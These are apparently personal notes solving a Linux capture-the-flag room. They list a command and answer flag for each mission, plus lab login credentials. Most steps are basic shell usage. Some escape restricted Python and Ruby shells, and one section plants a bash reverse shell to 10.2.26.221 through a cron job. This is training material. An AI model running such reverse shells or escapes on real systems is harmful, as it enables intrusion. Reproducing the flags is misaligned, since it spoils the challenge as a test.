

Linux Agency
==============

Init user: agent47

Password: 640509040147

Flag Format: username{md5sum} md5sum is the password.

Mission 1: Log in
Mission1 Flag: mission1{174dc8f191bcbb161fe25f8a5b58d1f0}

Mission 2: ls the home directory
Mission 2 Flag: mission2{8a1b68bb11e4a35245061656b5b9fa0d}

Mission3: cat flag.txt
Mission 3 Flag: mission3{ab1e1ae5cba688340825103f70b0f976}

Mission 4: strings flag.txt
Mission4 Flag: mission4{264a7eeb920f80b3ee9665fafb7ff92d}

Mission5: View flag.txt in flag document
Misison 5 Flag: mission5{bc67906710c3a376bcc7bd25978f62c0}

Mission 6: cat .flag.txt
Mission 6: mission6{1fa67e1adc244b5c6ea711f0c9675fde}

Mission 7: cat .flag/flag.txt
Mission 7 Flag: mission7{53fd6b2bad6e85519c7403267225def5}

Mission 8: cat flag.txt (challenge was that the home directory was changed)
Mission 8 Flag: mission8{3bee25ebda7fe7dc0a9d2f481d10577b}

Mission 9: cat /flag.txt
Mission 9 Flag: mission9{ba1069363d182e1c114bef7521c898f5}

Mission 10: grep "mission10{" rockyou.txt
Mission 10 Flag: mission10{0c9d1c7c5683a1a29b05bb67856524b6}

Mission 11: grep -iRl mission11{ folder/ (OR find . -type f -exec grep mission11 {} \;)
Mission 11 Flag: mission11{db074d9b68f06246944b991d433180c0}

Mission 12: env
Mission 12 Flag: mission12{f449a1d33d6edc327354635967f9a720}

Mission 13: chmod 400 flag.txt
Mission 13 Flag: mission13{076124e360406b4c98ecefddd13ddb1f}

Mission 14: cat flag.txt | base64 -d
Mission 14 Flag: mission14{d598de95639514b9941507617b9e54d2}

Mission 15: Binary to Ascii Convert
Mission 15 Flag: mission15{fc4915d818bfaeff01185c3547f25596}

Mission 16: cat flag.txt | xxd -p -r
Mission 16 Flag: mission16{884417d40033c4c2091b44d7c26a908e}

Misison 17: chmod +x flag; ./flag
Mission 17 Flag: mission17{49f8d1348a1053e221dfe7ff99f5cbf4}

Mission 18: javac flag.java; java flag
Mission 18 Flag: mission18{f09760649986b489cda320ab5f7917e8}

Mission 19: ruby flag.rb
Mission 19: mission19{a0bf41f56b3ac622d808f7a4385254b7}

Mission 20: gcc flag.c -o flag
Mission 20: mission20{b0482f9e90c8ad2421bf4353cd8eae1c}

Mission 21: python3 flag.py
Mission 21: mission21{7de756aabc528b446f6eb38419318f0c}

Mission 22: /bin/bash -i (mission was to stabilize the shell)
Mission 22: mission22{24caa74eb0889ed6a2e6984b42d49aaf}

Mission 23: Pretty good challenge (given a python shell; Escaped using: import os; os.system("/bin/bash");)
Mission 23: mission23{3710b9cb185282e3f61d2fd8b1b4ffea}

Mission 24: curl http://localhost/ | grep mission24 
Mission 24: mission24{dbaeb06591a7fd6230407df3a947b89c}

Mission 25: export pocket=money; ./bribe (Actually, you could just read the .viminfo)
Mission 25: mission25{61b93637881c87c71f220033b22a921b}

Mission 26: The PATH was not set... so /bin/cat flag.txt was the way out. (Also do not forget to switch the user with /bin/su)
Mission 26: mission26{cb6ce977c16c57f509e9f8462a120f00}

Mission 27: Flag was in file header, so strings.
Mission 27: mission27{444d29b932124a48e7dddc0595788f4d}

Mission 28: file flag.*.*.gz; gzip -d flag.*.*.gz; strings flag.*.*.gif
Mission 28: mission28{03556f8ca983ef4dc26d2055aef9770f}

Mission29: Escape the ruby shell and use rev command to reverse the output.
	- To escape ruby: system('/bin/bash')
	- To get the flag: cat txt.galf | rev
Mission29: mission29{8192b05d8b12632586e25be74da2fff1}

Mission 30: Ez pz; find . -type f -exec grep mission30 {} \;
Mission 30: mission30{d25b4c9fac38411d2fcb4796171bda6e}

Finding the viktor's flag: git log
Viktor's flag: viktor{b52c60124c0f8f85fe647021122b3d9a}

==========================================================

Dalia's Flag:

	There was a cron job running, so I called reverse shell.
		bash -i >& /dev/tcp/10.2.26.221/1234 0>&1

Flag: dalia{4a94a7a7bb4a819a63a33979926c77dc}

Silvio's Flag:

Reza's Flag: reza{2f1901644eda75306f3142d837b80d3e}

maya{a66e159374b98f64f89f7c8d458ebb2b}
